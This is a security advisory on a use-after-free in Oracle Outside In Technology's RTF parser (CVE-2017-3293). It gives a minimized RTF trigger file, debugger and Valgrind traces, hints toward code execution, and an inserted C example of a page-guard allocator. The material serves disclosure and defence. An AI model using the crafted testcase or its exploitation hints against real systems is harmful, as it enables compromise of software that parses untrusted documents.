CVE-2017-3293
An exploitable Use After Free vulnerability exists in the RTF parser functionality of Oracle Outside In Technology SDK. A specially crafted RTF document can cause a reuse of a reference to the previously freed memory which can be manipulated into achieving arbitrary code execution.
Oracle Outside In Technology 8.5.3.
http://www.oracle.com/us/technologies/embedded/025613.htm
8.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:C/A:C
Oracle Outside In Technology SDK is a widely used file format access and filtering framework. It’s used in many enterprise software distributions for accessing, parsing, filtering and converting numerous file formats.
While parsing a specially crafted RTF document, a reference to a freed object is reused. If during the window of time after the object is freed and before its reference is reused, the same memory area is properly manipulated, it may result in arbitrary reading or writing of memory that could ultimately result in arbitrary code execution.
The minimized testcase that triggers this vulnerability is as follows:
{\rtf1
\ansi
{
\info
\par
}
{
\footer
\posx
{ \par }
}
{
\footer
}
}
In the above example testcase, the \par directive causes allocation of memory for an object which is subsequently freed. When document rendering reaches the second \footer directive, the same memory area is reused without a new allocation. This results in accessing the freed memory. With proper memory manipulation, the attacker can cause the same area of memory to be allocated for a different object. With control of the allocated memory.
The memory allocation and object initialization is done in the function at 0xb6031310 in the libde_wp.so shared library (with image base 0xb6022000):
[----------------------------------registers-----------------------------------]
EAX: 0xad496ac0 (0xad496ac0)
EBX: 0xb6073934 --> 0x517f0
ECX: 0xb5f52bac --> 0x10000
EDX: 0x4
ESI: 0xb5f52bac --> 0x10000
EDI: 0xad4c7f38 --> 0x1
EBP: 0xad499f58 --> 0x1
ESP: 0xbfffb1f0 --> 0x0
EIP: 0xb60352b6 (mov DWORD PTR [esp+0x28],eax)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xb60352aa: xor edx,edx
0xb60352ac: mov eax,0x4
0xb60352b1: call 0xb6031310
=> 0xb60352b6: mov DWORD PTR [esp+0x28],eax
0xb60352ba: mov edx,DWORD PTR [esp+0x28]
0xb60352be: test edx,edx
0xb60352c0: jne 0xb6034e40
0xb60352c6: jmp 0xb6034caa
[------------------------------------stack-------------------------------------]
0000| 0xbfffb1f0 --> 0x0
0004| 0xbfffb1f4 --> 0x0
0008| 0xbfffb1f8 --> 0xb603edae (<OIWCloseFatal>: push ebx)
0012| 0xbfffb1fc --> 0xb601b4f0 --> 0xb70d9edc --> 0xc002
0016| 0xbfffb200 --> 0xb5f53d8c --> 0x0
0020| 0xbfffb204 --> 0x0
0024| 0xbfffb208 --> 0x0
0028| 0xbfffb20c --> 0xb5f52bac --> 0x10000
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Breakpoint 16, 0xb60352b6 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
gdb-peda$ bt
#0 0xb60352b6 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#1 0xb603bb0f in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#2 0xb603ccd3 in PWPreviewGetPage () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#3 0xb603fb58 in OIW_PLMCallback () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#4 0xb6057bf8 in PLPageRetrieve () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#5 0xb605b3cd in PLMH_MapDrawToRect () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#6 0xb603df4d in DEProc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#7 0xb6f46192 in GAPSetOutputInfoImgExNP () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#8 0xb6f52869 in GAPMetafileToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#9 0xb6fb10c8 in GAGraphicToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#10 0xb6fcdfec in EUDoConversionIX () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#11 0xb6fc9522 in VwImageExportWriteFunc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#12 0xb6fc2852 in VwExportWriteFuncEx () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#13 0xb6fe2bb5 in VwExportWrite () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libex_img.so
#14 0xb7d63e61 in FARunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_fa.so
#15 0xb7fa4602 in EXRunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_ex.so
#16 0x08048b7b in main ()
gdb-peda$
In the above output, we can see that the allocated buffer is at 0xad496ac0. The buffer is later freed at 0xb602de67 in the same library by calling SYSNativeFree, which is a wrapper around free():
gdb-peda$ awatch *0xad496ac0
Hardware access (read/write) watchpoint 17: *0xad496ac0
gdb-peda$ c
Continuing.
[----------------------------------registers-----------------------------------]
EAX: 0x4
EBX: 0xb6073934 --> 0x517f0
ECX: 0x7
EDX: 0x0
ESI: 0xad496ac0 (0xad496ac0)
EDI: 0xad496ac0 (0xad496ac0)
EBP: 0x1
ESP: 0xbfffa930 --> 0xb5f53e04 --> 0x0
EIP: 0xb602de5c (mov DWORD PTR [esp],esi)
EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xb602de52: je 0xb602de5a
0xb602de54: mov DWORD PTR [esi+0xc80],edx
0xb602de5a: mov esi,DWORD PTR [edi]
=> 0xb602de5c: mov DWORD PTR [esp],esi
0xb602de5f: call 0xb6027384 <SYSNativeUnlock@plt>
0xb602de64: mov DWORD PTR [esp],esi
0xb602de67: call 0xb6027424 <SYSNativeFree@plt>
0xb602de6c: add esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xbfffa930 --> 0xb5f53e04 --> 0x0
0004| 0xbfffa934 --> 0x1
0008| 0xbfffa938 --> 0x10001
0012| 0xbfffa93c --> 0xb6073934 --> 0x517f0
0016| 0xbfffa940 --> 0xb6073934 --> 0x517f0
0020| 0xbfffa944 --> 0xb601b9b0 --> 0xb601ba00 --> 0xb601b4f0 --> 0xb70d9edc --> 0xc002
0024| 0xbfffa948 --> 0xb5f38ac0 (0xb5f38ac0)
0028| 0xbfffa94c --> 0xb602e243 (mov ecx,edi)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Hardware access (read/write) watchpoint 17: *0xad496ac0
Value = 0xad496ac0
0xb602de5c in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
gdb-peda$ bt
#0 0xb602de5c in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#1 0xb602e243 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#2 0xb603336f in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#3 0xb6035dc0 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#4 0xb6036abe in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#5 0xb603b31e in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#6 0xb603ccd3 in PWPreviewGetPage () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#7 0xb603fb58 in OIW_PLMCallback () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#8 0xb6057bf8 in PLPageRetrieve () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#9 0xb605b3cd in PLMH_MapDrawToRect () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#10 0xb603df4d in DEProc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#11 0xb6f46192 in GAPSetOutputInfoImgExNP () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#12 0xb6f52869 in GAPMetafileToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#13 0xb6fb10c8 in GAGraphicToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#14 0xb6fcdfec in EUDoConversionIX () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#15 0xb6fc9522 in VwImageExportWriteFunc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#16 0xb6fc2852 in VwExportWriteFuncEx () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#17 0xb6fe2bb5 in VwExportWrite () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libex_img.so
#18 0xb7d63e61 in FARunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_fa.so
#19 0xb7fa4602 in EXRunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_ex.so
#20 0x08048b7b in main ()
gdb-peda$
The first Use After Free condition occurs at 0xb6036062. During normal execution, the process will not crash because the memory still contains the same valid data, even though it is freed. If a debugging allocator is used (such as libduma), the freed page will be kept busy, but will be marked unreadable in order to catch this kind of issue. In that case, resuming the execution results in the following crash:
gdb-peda$ c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xad496ac0 (0xad496ac0)
EBX: 0xb6073934 --> 0x517f0
ECX: 0x4c ('L')
EDX: 0xbfffb22c --> 0xb6073934 --> 0x517f0
ESI: 0xad385ac0 (0xad385ac0)
EDI: 0x0
EBP: 0xad34dac0 (0xad34dac0)
ESP: 0xbfffafd0 --> 0xbfffb058 --> 0x0
EIP: 0xb6036062 (cmp DWORD PTR [eax+0x40],0xffffffff)
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0xb603604e: je 0xb60362ec
0xb6036054: cmp WORD PTR [esi+0x9dc],0x0
0xb603605c: js 0xb60362ec
=> 0xb6036062: cmp DWORD PTR [eax+0x40],0xffffffff
0xb6036066: je 0xb60362ec
0xb603606c: lea edx,[esi+0x30]
0xb603606f: mov DWORD PTR [esp+0x4c],edx
0xb6036073: add eax,0x40
[------------------------------------stack-------------------------------------]
0000| 0xbfffafd0 --> 0xbfffb058 --> 0x0
0004| 0xbfffafd4 --> 0x0
0008| 0xbfffafd8 --> 0x1d4
0012| 0xbfffafdc --> 0xb7c685b4 ("LOGetString")
0016| 0xbfffafe0 --> 0x1
0020| 0xbfffafe4 --> 0xb6020fa8 --> 0xb6076d51 --> 0xb6022000 --> 0x464c457f
0024| 0xbfffafe8 --> 0x16
0028| 0xbfffafec --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xb6036062 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
gdb-peda$ vmmap $eax
Start End Perm Name
0xad46b000 0xad499000 ---p mapped
gdb-peda$ bt
#0 0xb6036062 in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#1 0xb6036abe in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#2 0xb603b31e in ?? () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#3 0xb603ccd3 in PWPreviewGetPage () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#4 0xb603fb58 in OIW_PLMCallback () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#5 0xb6057bf8 in PLPageRetrieve () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#6 0xb605b3cd in PLMH_MapDrawToRect () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#7 0xb603df4d in DEProc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libde_wp.so
#8 0xb6f46192 in GAPSetOutputInfoImgExNP () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#9 0xb6f52869 in GAPMetafileToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_du.so
#10 0xb6fb10c8 in GAGraphicToHandle () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#11 0xb6fcdfec in EUDoConversionIX () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#12 0xb6fc9522 in VwImageExportWriteFunc () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#13 0xb6fc2852 in VwExportWriteFuncEx () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_img.so
#14 0xb6fe2bb5 in VwExportWrite () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libex_img.so
#15 0xb7d63e61 in FARunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_fa.so
#16 0xb7fa4602 in EXRunExport () from /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/libsc_ex.so
#17 0x08048b7b in main ()
gdb-peda$
In the above output, it should be observed that the pointer being dereferenced in the cmp instruction is the same as the one previously freed, and the process has crashed because the page permissions deny read access.
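The debugging-allocator behaviour described above (freed memory kept mapped but made unreadable) can be reproduced in isolation. The following is an added example, not part of the original advisory and not libduma's code: a minimal page-guard allocator in C for Linux/POSIX. The names guard_alloc, guard_free, probe_read and stale_read_outcome are hypothetical; the 5,440-byte size and the 0x40 offset are taken from the traces on this page.

```c
#define _DEFAULT_SOURCE
#include <setjmp.h>
#include <signal.h>
#include <stdio.h>
#include <sys/mman.h>
#include <unistd.h>

static sigjmp_buf probe_env;
static void on_fault(int sig) { (void)sig; siglongjmp(probe_env, 1); }

/* Round up to whole pages so every object owns its own mapping. */
static size_t page_round(size_t n) {
    size_t pg = (size_t)sysconf(_SC_PAGESIZE);
    return (n + pg - 1) / pg * pg;
}

/* Allocate one private anonymous mapping per object. */
void *guard_alloc(size_t n) {
    void *p = mmap(NULL, page_round(n), PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    return p == MAP_FAILED ? NULL : p;
}

/* "Free": keep the pages mapped so the address is never recycled, but
   revoke all access so any stale dereference faults at once. */
int guard_free(void *p, size_t n) {
    return mprotect(p, page_round(n), PROT_NONE);
}

/* Returns 1 if a 4-byte read at addr succeeds, 0 if it faults. */
int probe_read(const volatile int *addr) {
    struct sigaction sa, old_segv, old_bus;
    volatile int ok = 0;
    sa.sa_handler = on_fault;
    sa.sa_flags = 0;
    sigemptyset(&sa.sa_mask);
    sigaction(SIGSEGV, &sa, &old_segv);
    sigaction(SIGBUS, &sa, &old_bus);
    if (sigsetjmp(probe_env, 1) == 0) {
        int v = *addr;      /* faults here if the page is PROT_NONE */
        (void)v;
        ok = 1;
    }
    sigaction(SIGSEGV, &old_segv, NULL);
    sigaction(SIGBUS, &old_bus, NULL);
    return ok;
}

/* Same shape as the advisory's trace: a 5,440-byte object is freed, then
   read at offset 0x40 through the stale pointer.
   Returns 2*readable_before_free + readable_after_free, or -1 on error. */
int stale_read_outcome(void) {
    char *obj = guard_alloc(5440);
    if (obj == NULL) return -1;
    int before = probe_read((const volatile int *)(obj + 0x40));
    if (guard_free(obj, 5440) != 0) return -1;
    int after = probe_read((const volatile int *)(obj + 0x40));
    return 2 * before + after;
}

int main(void) { printf("outcome=%d\n", stale_read_outcome()); return 0; }
```

With a conventional allocator the second read would normally succeed silently, which is why the unmodified testcase does not crash; here the stale read is turned into a deterministic fault at the exact instruction that performs it.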
By further manipulating the document by placing an object of precise size between the point of free and point of reuse, further memory corruption can be achieved potentially resulting in arbitrary code execution.
The vulnerability can be triggered by running the ixsample binary, included in the SDK, with the above-mentioned testcase. Although the supplied testcase doesn’t cause a crash, the use after free can be caught with Valgrind, for example.
Example output from Valgrind:
$ valgrind $IX ./5f06aa03c157a4f7522d42320f523e93.rtf asd
==17551== Memcheck, a memory error detector
==17551== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==17551== Using Valgrind-3.10.1 and LibVEX; rerun with -h for copyright info
==17551== Command: /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/sdk/demo/ixsample ./5f06aa03c157a4f7522d42320f523e93.rtf asd
==17551==
Creating file: "asd"
==17551== Invalid read of size 4
==17551== at 0x5912062: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5912ABD: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x591731D: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5918CD2: PWPreviewGetPage (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x591BB57: OIW_PLMCallback (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5933BF7: PLPageRetrieve (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x59373CC: PLMH_MapDrawToRect (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5919F4C: DEProc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5170191: GAPSetOutputInfoImgExNP (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551== by 0x517C868: GAPMetafileToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551== by 0x508B0C7: GAGraphicToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== by 0x50A7FEB: EUDoConversionIX (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== Address 0x5d37fd0 is 64 bytes inside a block of size 5,440 free'd
==17551== at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551== by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
==17551== Invalid read of size 4
==17551== at 0x5905DB7: WPUCompSccvwPos (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== Address 0x5d37fd0 is 64 bytes inside a block of size 5,440 free'd
==17551== at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551== by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
==17551== Invalid read of size 4
==17551== at 0x5912062: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5912A63: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x591731D: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5918CD2: PWPreviewGetPage (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x591BB57: OIW_PLMCallback (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5933BF7: PLPageRetrieve (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x59373CC: PLMH_MapDrawToRect (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5919F4C: DEProc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5170191: GAPSetOutputInfoImgExNP (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551== by 0x517C868: GAPMetafileToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551== by 0x508B0C7: GAGraphicToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== by 0x50A7FEB: EUDoConversionIX (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== Address 0x5d37fd0 is 64 bytes inside a block of size 5,440 free'd
==17551== at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551== by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
==17551== Invalid read of size 1
==17551== at 0x59174BE: ??? (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5918CD2: PWPreviewGetPage (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x591BB57: OIW_PLMCallback (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5933BF7: PLPageRetrieve (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x59373CC: PLMH_MapDrawToRect (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5919F4C: DEProc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libde_wp.so)
==17551== by 0x5170191: GAPSetOutputInfoImgExNP (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551== by 0x517C868: GAPMetafileToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_du.so)
==17551== by 0x508B0C7: GAGraphicToHandle (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== by 0x50A7FEB: EUDoConversionIX (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== by 0x50A3521: VwImageExportWriteFunc (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== by 0x509C851: VwExportWriteFuncEx (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libsc_img.so)
==17551== Address 0x5d394b0 is 5,408 bytes inside a block of size 5,440 free'd
==17551== at 0x402C2CD: free (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so)
==17551== by 0x4809C16: SYSNativeFree (in /home/ea/triage/oit_pdf/ix-8-5-3-linux-x86-32/redist/libwv_core.so)
==17551==
Export successful: 1 output file(s) created.
==17551==
==17551== HEAP SUMMARY:
==17551== in use at exit: 28 bytes in 2 blocks
==17551== total heap usage: 19,458 allocs, 19,456 frees, 25,394,878 bytes allocated
==17551==
==17551== LEAK SUMMARY:
==17551== definitely lost: 0 bytes in 0 blocks
==17551== indirectly lost: 0 bytes in 0 blocks
==17551== possibly lost: 0 bytes in 0 blocks
==17551== still reachable: 28 bytes in 2 blocks
==17551== suppressed: 0 bytes in 0 blocks
==17551== Rerun with --leak-check=full to see details of leaked memory
==17551==
==17551== For counts of detected and suppressed errors, rerun with: -v
==17551== ERROR SUMMARY: 12 errors from 4 contexts (suppressed: 0 from 0)
2016-10-10 - Vendor Disclosure
2017-01-17 - Public Release
Discovered by Aleksandar Nikolic of Cisco Talos.